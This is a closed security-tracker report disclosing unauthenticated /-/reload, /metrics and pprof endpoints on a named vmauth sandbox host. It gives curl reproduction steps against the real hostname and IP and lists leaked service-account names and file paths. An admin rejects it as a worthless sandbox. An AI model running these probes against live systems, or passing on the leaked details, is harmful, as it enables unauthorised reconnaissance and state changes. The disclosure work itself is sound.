Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by hellofresh01 - 05.10.2026
Last edited by cbay - 05.10.2026

FS#519 - Unauthenticated vmauth administrative config reload and internal metrics/pprof exposure on sandbox-f

Summary
The host sandbox-fnonnenmacher2.paris1.alwaysdata.com runs vmauth v1.137.0, a VictoriaMetrics authentication proxy that protects an internal monitoring backend with HTTP Basic Auth. Multiple administrative and diagnostic paths are exempt from authentication.

Two are materially impactful:

/-/reload is unauthenticated and state-changing. An anonymous POST forces vmauth to re-read /etc/vmauth/config.yml, the file that defines authentication policy, users, tokens, and backend routing. The reload is proven by vmauth’s own reload counter advancing by exactly 1 per anonymous request.

/metrics is unauthenticated. It leaks internal service-account usernames, config paths, TLS certificate paths, version information, and runtime telemetry.

Sibling administrative endpoints such as /-/quit, /-/stop, /config, and /internal/flags correctly return 401. This is an ad-hoc exemption list, not an intended design.

Severity: Medium
CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N → 7.5
Escalation: Critical if any other primitive allows influencing /etc/vmauth/config.yml.

Affected asset:

Host: sandbox-fnonnenmacher2.paris1.alwaysdata.com

IP: 185.31.41.181

Service: vmauth v1.137.0

Steps to Reproduce / PoC
1. Confirm the authentication gate exists on the same host
bash
curl -sk -o /dev/null -w '%{http_code}\n' \

https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/

Expected:

text
401
This is the control: the root path is protected.

2. Confirm /metrics is exempt and leaks internal data
bash
curl -sk -o /dev/null -w '%{http_code}\n' \

https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics

Expected:

text
200
Leaked data:

bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \

| grep -E 'username=|auth.config|tlsCertFile|version='

Observed output includes:

text
vmauth_user_concurrent_requests_capacity{username="admin"} 1000
vmauth_user_concurrent_requests_capacity{username="aldjango"} 1000
vmauth_user_concurrent_requests_capacity{username="grafana"} 1000
vmauth_user_concurrent_requests_capacity{username="telegraf"} 1000

name="auth.config", value="/etc/vmauth/config.yml", is_set="true"
name="tlsCertFile", value="/etc/ssl/certs/alwaysdata.org.bundle.pem", is_set="true"
version="vmauth-20260227-182711-tags-v1.137.0-0-g2aecca1163"
short_version="v1.137.0"
These usernames are not otherwise obtainable without authentication.

3. Prove /-/reload is unauthenticated and state-changing
Baseline the reload counter:

bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \

| grep vmauth_config_last_reload_total

Example:

text
vmauth_config_last_reload_total 7
Send an anonymous reload request:

bash
curl -sk -X POST https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/-/reload Observed:

http
HTTP/1.1 200 OK
x-server-hostname: sandbox-fnonnenmacher2
content-length: 0
Re-read the counter:

bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \

| grep vmauth_config_last_reload_total

Observed:

text
vmauth_config_last_reload_total 8
Delta: 1

Repeat:

bash
curl -sk -X POST https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/-/reload curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \

| grep vmauth_config_last_reload_total

Observed:

text
vmauth_config_last_reload_total 9
Delta: 1

The counter advanced from 7 → 34 across repeated passes, always by exactly 1 per anonymous POST.

4. Control: sibling admin endpoint is correctly gated
bash
curl -sk -X POST https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/-/quit Observed:

http
HTTP/1.1 401 Unauthorized
Www-Authenticate: Basic realm="Restricted"
Counter delta: 0

This proves /-/reload is an omission, not a design where all admin routes are open.

5. Additional unauthenticated pprof exposure
bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/debug/pprof/cmdline Observed:

text
/usr/bin/vmauth -envflag.enable
The full pprof surface is exposed, including:

/debug/pprof/

/debug/pprof/cmdline

/debug/pprof/heap?debug=1

/debug/pprof/allocs?debug=1

/debug/pprof/goroutine?debug=2

/debug/pprof/trace?seconds=1

Impact
1. Unauthenticated administrative action
An anonymous Internet client can force the authentication proxy to reload its configuration. /-/reload is an administrative operation and must not be triggerable without credentials.

2. Potential full authentication bypass if chained
/-/reload re-reads /etc/vmauth/config.yml. If any other bug, misconfiguration, deployment pipeline, or local file-write primitive allows influencing that file, this endpoint provides the unauthenticated trigger that makes vmauth adopt the attacker’s policy. That would convert a write-only primitive into full authentication bypass for the internal monitoring backend.

No such config-write primitive was found during this assessment, so the finding is not rated Critical on its own.

3. Internal information disclosure
/metrics and pprof leak:

Internal service-account names: admin, aldjango, grafana, telegraf

Configuration file path: /etc/vmauth/config.yml

TLS certificate path: /etc/ssl/certs/alwaysdata.org.bundle.pem

Exact vmauth version and Go runtime version

Process command line: /usr/bin/vmauth -envflag.enable

Heap, allocs, goroutine, mutex, and trace profiling data

Closed by  cbay
05.10.2026 10:41
Reason for closing:  Invalid
Admin
cbay commented on 05.10.2026 10:41

Hello,

This is a sandbox instance, nothing is valuable here.

Kind regards,
Cyril

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing